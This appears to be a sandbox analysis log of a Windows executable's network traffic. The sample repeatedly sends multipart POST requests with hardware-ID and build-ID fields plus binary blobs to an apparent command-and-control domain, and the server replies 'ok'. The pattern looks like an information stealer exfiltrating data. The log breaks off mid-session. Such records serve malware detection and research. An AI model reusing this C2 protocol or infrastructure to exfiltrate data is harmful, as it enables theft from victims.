                                                              2024-04-20 11:27:04 UTC1369INData Raw: 78 58 42 33 37 51 61 56 55 68 58 57 39 56 51 51 4c 36 4b 77 47 6c 42 79 32 72 4f 77 58 54 49 32 49 49 54 56 61 62 33 6b 72 46 44 43 63 7a 47 45 61 49 38 64 65 62 48 6d 4f 6e 68 48 37 62 67 5a 47 47 72 57 6d 39 63 2f 64 44 63 39 79 49 77 74 39 63 53 7a 58 38 31 7a 64 2b 38 4d 6c 46 59 51 31 66 74 65 48 53 61 73 76 68 6c 54 50 5a 2f 65 6d 33 67 61 57 6c 4f 45 69 6a 4f 39 6d 66 6b 62 2f 58 5a 6e 2b 78 4f 63 45 33 6d 78 34 42 78 37 52 37 54 58 66 6a 4e 79 6b 39 65 62 62 6a 42 78 4f 64 61 48 49 66 50 45 74 46 37 50 65 6e 62 68 42 5a 78 5a 47 4e 4c 35 58 52 6f 2b 72 72 4d 62 58 7a 79 59 31 64 59 38 63 54 78 34 69 75 56 41 6c 6f 47 38 51 34 77 74 4d 36 77 76 6c 31 34 2f 30 66 4e 56 55 30 54 47 6f 46 73 77 57 59 32 7a 73 46 30 79 4e 6a 53 45 31 57 6d 39 7a 62 46
                                                              Data Ascii: xXB37QaVUhXW9VQQL6KwGlBy2rOwXTI2IITVab3krFDCczGEaI8debHmOnhH7bgZGGrWm9c/dDc9yIwt9cSzX81zd+8MlFYQ1fteHSasvhlTPZ/em3gaWlOEijO9mfkb/XZn+xOcE3mx4Bx7R7TXfjNyk9ebbjBxOdaHIfPEtF7PenbhBZxZGNL5XRo+rrMbXzyY1dY8cTx4iuVAloG8Q4wtM6wvl14/0fNVU0TGoFswWY2zsF0yNjSE1Wm9zbF
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 65 6b 43 6d 46 6b 5a 31 66 42 41 45 69 4f 6b 75 42 35 56 50 5a 72 65 31 53 52 31 4f 6a 50 4d 68 43 58 37 67 66 55 7a 70 78 34 78 36 78 76 51 43 31 4f 61 79 56 45 64 4a 37 79 77 46 6c 52 79 2f 4c 44 45 65 42 70 61 49 61 7a 6d 51 4c 33 47 74 78 75 55 4e 7a 48 67 44 5a 42 63 48 64 62 30 57 68 49 67 6f 37 67 51 55 54 71 63 79 64 6f 79 65 6a 41 32 79 34 77 76 2b 4d 53 2f 58 4d 68 7a 66 71 78 4e 2b 44 68 36 6d 76 68 4b 55 33 54 76 2f 7a 70 66 4a 37 58 68 6d 31 34 5a 4c 6e 61 73 35 6a 4b 56 71 74 41 62 79 33 6b 78 74 45 48 51 57 52 72 65 2f 46 59 57 49 36 79 2b 45 30 6f 31 6e 63 6e 56 4f 33 30 35 4d 4d 32 4d 4c 2f 6a 4d 76 56 66 47 64 48 62 69 44 5a 67 54 58 37 4b 55 4f 56 4d 72 74 66 39 4e 47 6e 4b 31 79 38 41 6b 5a 44 77 5a 79 59 4a 72 6c 61 71 6b 46 61 51 65
                                                              Data Ascii: ekCmFkZ1fBAEiOkuB5VPZre1SR1OjPMhCX7gfUzpx4x6xvQC1OayVEdJ7ywFlRy/LDEeBpaIazmQL3GtxuUNzHgDZBcHdb0WhIgo7gQUTqcydoyejA2y4wv+MS/XMhzfqxN+Dh6mvhKU3Tv/zpfJ7Xhm14ZLnas5jKVqtAby3kxtEHQWRre/FYWI6y+E0o1ncnVO305MM2ML/jMvVfGdHbiDZgTX7KUOVMrtf9NGnK1y8AkZDwZyYJrlaqkFaQe
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 39 42 46 4e 50 33 56 68 6f 73 71 62 55 59 58 7a 4b 52 31 74 34 79 66 44 55 2f 78 49 45 6b 2b 73 6d 30 58 38 78 36 4d 61 4a 72 2b 7a 68 52 33 65 63 53 53 32 37 74 6e 78 35 4f 45 35 72 51 79 58 59 61 57 69 65 4b 35 55 44 6b 71 64 41 77 6a 48 4a 39 72 46 76 53 45 78 2f 54 2f 6c 6f 64 49 4b 57 37 42 31 67 35 6e 64 54 61 4f 58 49 79 4f 63 36 46 4f 66 76 42 73 46 50 4c 66 58 58 69 45 5a 46 63 55 5a 53 58 4f 58 68 73 71 71 64 56 41 48 44 55 36 73 30 78 64 54 35 36 37 59 6f 77 2f 4d 75 34 55 4d 41 31 47 59 63 63 33 6a 74 36 77 35 63 35 65 47 79 71 73 31 55 41 63 4e 54 57 31 7a 74 32 49 7a 54 45 6a 53 4c 36 79 36 6c 55 77 33 68 79 37 41 61 43 55 67 50 56 39 46 63 51 4b 4b 4b 77 47 56 41 34 31 4a 57 7a 58 52 6c 78 50 39 7a 4e 63 37 2b 42 6c 31 6a 64 66 7a 50 4c 47
                                                              Data Ascii: 9BFNP3VhosqbUYXzKR1t4yfDU/xIEk+sm0X8x6MaJr+zhR3ecSS27tnx5OE5rQyXYaWieK5UDkqdAwjHJ9rFvSEx/T/lodIKW7B1g5ndTaOXIyOc6FOfvBsFPLfXXiEZFcUZSXOXhsqqdVAHDU6s0xdT567Yow/Mu4UMA1GYcc3jt6w5c5eGyqs1UAcNTW1zt2IzTEjSL6y6lUw3hy7AaCUgPV9FcQKKKwGVA41JWzXRlxP9zNc7+Bl1jdfzPLG
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 61 2b 45 70 54 64 4f 2f 2f 4e 6b 38 6b 6e 73 43 62 58 68 6b 75 64 71 7a 6d 4d 70 57 71 30 42 76 4c 65 54 47 30 51 64 42 65 46 74 54 33 56 42 30 71 76 37 4d 61 58 6a 4b 56 30 64 59 36 65 54 59 32 7a 34 73 75 38 4d 47 39 58 63 68 78 64 65 49 41 30 42 31 35 73 5a 51 53 46 44 54 74 35 31 63 59 46 62 6e 71 6d 52 56 6c 4a 7a 4c 44 67 54 33 32 77 4c 68 4e 77 57 55 78 68 47 69 50 48 58 6d 78 35 6a 70 34 52 2b 32 34 47 52 68 71 31 70 76 51 4f 48 63 77 4e 4d 36 4b 4a 65 2f 41 73 56 66 4e 63 6e 62 6e 45 5a 74 42 47 74 4c 38 58 42 73 6c 72 62 45 56 57 54 2b 55 6d 35 56 65 47 56 70 34 77 35 56 72 70 59 50 37 66 75 39 69 5a 2b 5a 42 73 30 51 48 30 50 68 65 42 53 65 73 76 41 4e 56 49 74 53 7a 73 43 6b 38 57 56 50 64 35 55 43 57 67 62 78 58 6a 43 30 7a 72 41 69 66 58 52
                                                              Data Ascii: a+EpTdO//Nk8knsCbXhkudqzmMpWq0BvLeTG0QdBeFtT3VB0qv7MaXjKV0dY6eTY2z4su8MG9XchxdeIA0B15sZQSFDTt51cYFbnqmRVlJzLDgT32wLhNwWUxhGiPHXmx5jp4R+24GRhq1pvQOHcwNM6KJe/AsVfNcnbnEZtBGtL8XBslrbEVWT+Um5VeGVp4w5VrpYP7fu9iZ+ZBs0QH0PheBSesvANVItSzsCk8WVPd5UCWgbxXjC0zrAifXR
                                                              2024-04-20 11:27:04 UTC1369INData Raw: 51 32 4c 46 31 48 34 59 4e 6f 57 62 67 33 51 69 59 32 4f 52 33 6e 79 74 6b 39 4d 77 30 7a 73 5a 68 78 72 34 4f 48 71 61 36 52 4a 4c 62 76 2f 78 66 54 4e 5a 31 4d 6d 62 62 6a 42 78 66 38 71 41 4b 76 37 50 75 45 6e 65 63 33 4c 36 41 4e 64 74 4c 2f 76 79 57 52 38 68 6f 72 51 72 5a 68 4f 5a 30 4e 63 37 66 54 6f 47 2b 70 67 6f 38 38 2b 38 54 64 30 31 50 34 52 6f 2b 78 4d 65 6d 71 63 51 4b 6d 7a 6c 2f 79 6f 57 57 76 2b 77 6d 79 34 79 61 58 71 45 75 43 6a 7a 7a 37 78 4e 33 54 68 51 34 51 69 63 58 68 37 52 76 78 78 37 52 38 62 2f 45 78 68 71 31 6f 75 56 58 68 6c 61 65 4d 43 63 61 36 57 44 36 77 6d 58 49 43 4b 37 55 38 49 37 65 73 57 78 4f 6e 67 31 78 64 52 2b 47 43 54 55 67 35 6c 6b 50 46 6c 54 72 38 30 35 76 5a 6e 35 47 34 74 32 59 2f 34 46 6b 30 55 53 6e 63 46
                                                              Data Ascii: Q2LF1H4YNoWbg3QiY2OR3nytk9Mw0zsZhxr4OHqa6RJLbv/xfTNZ1MmbbjBxf8qAKv7PuEnec3L6ANdtL/vyWR8horQrZhOZ0Nc7fToG+pgo88+8Td01P4Ro+xMemqcQKmzl/yoWWv+wmy4yaXqEuCjzz7xN3ThQ4QicXh7Rvxx7R8b/Exhq1ouVXhlaeMCca6WD6wmXICK7U8I7esWxOng1xdR+GCTUg5lkPFlTr805vZn5G4t2Y/4Fk0USncF


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449734104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:04 UTC288OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 18164
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:04 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:04 UTC2833OUTData Raw: dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd
                                                              Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R
                                                              2024-04-20 11:27:05 UTC812INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=tc7mr2nv9r6md4n096ik7m5lqr; expires=Wed, 14-Aug-2024 05:13:44 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BXOwMCK2jfGUojnwY%2F0K2sBsb2R0uYDNYf7WNzvzY%2BcfvB9zmlJ7FDATh%2FQZspCrBqueW%2FTW0K1BEx3n7gddrJAlR4UFnGWk7puqsLA8aKtL9OnMLmzid5nNzKvjH%2BWDKPK%2BJqsInMs"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c877fdae7bac-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                              Data Ascii: fok 81.181.57.52
                                                              2024-04-20 11:27:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449735104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:05 UTC287OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 8785
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:05 UTC8785OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:06 UTC806INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=mgspne2c0k7v3nuo3b8ldcttov; expires=Wed, 14-Aug-2024 05:13:45 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzy%2BpuD0vOiKoN5KxLi3o8303vZx4pCJoOR4%2BbtD6sYbGUSm9CWtw4MEtcP48AzJOgTS5K5C%2BtWnl%2BKXBUbNZiAGLUahd3Pprd9Ky3pXgy2yNLhp86w0lDDrOp8AXOWMpt1zy7oyQzPq"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c87d5f0b69e9-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                              Data Ascii: fok 81.181.57.52
                                                              2024-04-20 11:27:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449736104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:06 UTC288OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 20438
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:06 UTC5107OUTData Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03
                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                              2024-04-20 11:27:07 UTC808INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:07 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=sb2um3ual3p809duu6taucp0tl; expires=Wed, 14-Aug-2024 05:13:46 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGNUJmK1aWh4F0QLf62vDHsagZUduQ7G%2Fpwt8x0NOvhXaNgGNF%2B%2Fr6rqtyyE6HHSLThLmDphqcY8lxNYsgGPgWT8Uj5YVdgW%2BcWfDyKZ46sHO%2FlNBI4WNPbSVYDBUgwuzXH0pa6kNGh6"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c8831d3912db-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                              Data Ascii: fok 81.181.57.52
                                                              2024-04-20 11:27:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449737104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:07 UTC287OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 5451
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:07 UTC5451OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:08 UTC810INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=mtcoarbne8en1ommj4pams2a3r; expires=Wed, 14-Aug-2024 05:13:47 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XP5I2TkYNKDghHhE%2F0ryoCwdTFdD6Q16xV10qWPz9%2BFf6s5DKcjakeTVoDu%2BYskgcjLK%2Fh6IOvRIiBHuFGcciqhWV9mGjSssn1QUHGh0S5onoer%2BnMtK1zmwwCruIU%2FQ8ZebOor8P11Q"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c8895f5f1d76-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                              Data Ascii: fok 81.181.57.52
                                                              2024-04-20 11:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449738104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:08 UTC287OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 1407
                                                              Host: incredibleextedwj.shop
                                                              2024-04-20 11:27:08 UTC1407OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 45 36 42 35 36 46 45 35 42 31 39 38 46 45 36 42 32 30 31 36 38 39 31 44 32 44 42 35 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 67 47 5a 73 72 2d 2d 4b 69 72 69 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"00E6B56FE5B198FE6B2016891D2DB500--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"jgGZsr--Kirie
                                                              2024-04-20 11:27:08 UTC800INHTTP/1.1 200 OK
                                                              Date: Sat, 20 Apr 2024 11:27:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=jnqlmvnjgrk744d5iu6di9n09p; expires=Wed, 14-Aug-2024 05:13:47 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7xGzj4pB6xBaMmjKSbWQ0TM%2FGSWoXNqLRXJav4BO4TsSbXcKqLEyuQnKI6oX7HE4aeMO3vq18WCFKXwaKtslrIsm0aTAeMVWMPXAt8dtpUkWEmmRGRicuAPahoo1Pl9bV08peXSjG1kx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8774c88e69a44545-ATL
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-04-20 11:27:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                              Data Ascii: fok 81.181.57.52
                                                              2024-04-20 11:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449739104.21.86.1064437508C:\Users\user\Desktop\RrHuyQ4GzG.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-20 11:27:09 UTC289OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
